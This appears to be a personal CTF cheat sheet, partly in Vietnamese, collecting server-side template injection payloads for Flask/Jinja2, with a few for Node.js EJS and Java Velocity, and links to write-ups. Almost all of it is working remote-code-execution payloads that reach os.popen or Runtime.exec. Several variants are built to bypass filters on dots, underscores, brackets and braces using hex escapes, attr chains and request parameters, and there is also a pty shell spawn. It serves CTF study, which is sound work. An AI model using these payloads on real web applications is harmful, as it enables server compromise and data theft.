Không nhất thiết phải SSTI để RCE mà dùng coi có thể tận dụng đc gì khác không như bài này
Flag Holder
https://hackmd.io/@onsra03/SkiBeaed3
-----------------------------------------python
__import__('pty').spawn('sh')
https://podalirius.net/en/ctf-writeups/fcsc-2021-intro-snake/

https://flask.palletsprojects.com/en/2.0.x/templating/
request.args.name
request.cookies.name
request.headers.name
request.values.name
request.form.name
https://hackmd.io/@Chivato/HyWsJ31dI
https://programmer.group/ctfshow-question-brushing-diary-web-ssti-web361-372.html
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('Is').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}
{{lipsum.__globals__.os.popen('<cmd>').read()}}
---------without .
{{lipsum["__globals__"]["os"]["popen"]("ls")["read"]()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('id')['read']()}}

https://hackmd.io/@onsra03/By77nbQv2#CaaS
name={{g.pop['__global''s__'].__builtins__.eval(request.form.a)}}
name={{g.pop['__global''s__'].__builtins__.eval('__import__("os").popen("id").read()')}}
POST /generate?a=__globals__&b=__import__("os").system("command inject") HTTP/1.1
name={{session.pop[request.values.a].__builtins__.exec(request.values.b)}}
----------------------------------blocks “.” and “_”:
{{request['application']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('id')['read']()}}

--------------------------------- blocks on “.”, “_”, “[]”
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

----------------------------------without using {{}}
{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('whoami')['read']() == 'chiv\n' %} a {% endif %}
{% set bla = lipsum.__globals__['os'].popen('ls / > /home/service/static/output.txt').read() %}

------------------------------------------filter word
{{['Thi','s wi','ll b','e appended']|join}}
?name={{lipsum|attr(request.values.a)|attr(request.values.b)(request.values.c)|attr(request.values.d)(request.values.ocean)|attr(request.values.f)()}}&ocean=cat /flag&a=__globals__&b=__getitem__&c=os&d=popen&f=read

---------------------------------other
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}
-----------------------------------------blind output
https://hackmd.io/@to016/imaginaryCTF2022 -- minigolf
---example https://hackmd.io/@Trumpiter/basicvulnweb
----------------------------------------------------------NODEJS
<%=JSON.stringify(process)%>  kiểm tra giá trị process
https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet
----------------------------------------------------------payload
{{['ls']|map('system')|join}}
--------------------------------------------------java
#set ($e="bla")
$e.getClass().forName("java.lang.Runtime").getRuntime().exec("calc")